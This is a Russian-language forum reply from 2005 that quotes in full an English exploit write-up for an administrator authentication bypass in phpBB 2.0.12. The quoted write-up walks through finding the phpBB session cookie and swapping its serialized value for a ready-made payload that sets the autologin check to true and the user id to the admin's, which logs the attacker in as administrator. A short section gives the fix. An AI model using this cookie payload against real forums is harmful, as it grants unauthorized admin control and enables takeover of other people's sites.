Показать сообщение отдельно
Старый 26.04.2005, 18:24   #16
ELF
Местный
 
Регистрация: 26.04.2005
Сообщений: 165
ELF на пути к лучшему
Отправить сообщение для ELF с помощью ICQ
По умолчанию Re: Что это значит???

Цитата:
Сообщение от Alex
И кто это был? Если не секрет...
какая разница кто? это мог сделать любой, прочитав вот это:
Цитата:
Сообщение от exploit
[size=9px]

-----------------------------------

phpBB 2.0.12 Session Handling
Administrator Authentication
Bypass EXPLOIT -SIMPLIFIED-
- By PPC^Rebyte

-----------------------------------

03maa2005

** NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW **

[ ENGLISH VERSION ]

*** Status
__________

phpBB has already been informed about this exploit and has released a
'critical update' on 27 februari 2005, however most forums are still running
version 2.0.12 or lower.

VULNERABLE:
- 2.0.x --> 2.0.12

IMMUNE:
- 2.0.13 or newer


1* Intro
________

The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit
for this bug.

Link to Paisterist's exploit at Packetstormsecurity:
http://packetstormsecurity.org/0503-...phpbbsession.c

This program didn't work as it should on my pc, so I had to find out a way
for myself to exploit the bug manually.
This seemed to be much easier than compiling that C exploit and fool around
with it until it eventually still doesn't work (in my case).
This simplified manual method I'll describe can also be used for Internet
Explorer or other browsers instead of only Mozilla/Firefox.


2* The bug
__________

We're going to edit a cookie so that when you visit a certain forum another
time you will get logged in having admin rights. This is possible due to a
bug in includes/sessions.php
--> if( $sessiondata['autologinid'] == $auto_login_key )


3* Preparation
______________

1. Register at forum?

2. Log in with account
+ UNCHECK "Log in automatically"

3. Close browser to be sure a cookie is made.

4. Locate cookie
*firefox: X:\Documents and Settings\Name\Application
Data\Mozilla\Firefox\Profiles\profile.default\cook ies.txt
--> search the .txt for the domainname (domain.tld)
--> default cookiename = phpbbmysql
*iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
--> default cookiename = phpbbmysql

4* Let's Xploit!
________________

Open the cookie in a text editor and search a line that resembles:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

|
[ your 'user id' ] ____|

Replace this with:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

|
[ 2 = 'user id' of admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save cookie and close.
Open your browser and surf to forum.

You'll now be automatically logged in having admin right


5* Solution
___________

* Update phpBB to version 2.0.13

- or -

* in "includes/sessions.php" replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


6* Outro
________

THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

-- PPC^Rebyte --
-- ppc@respected.as --


+++++++++++++++++++++++++++++

[/size]
__________________
Жизнь - странная штука...
ELF вне форума   Ответить с цитированием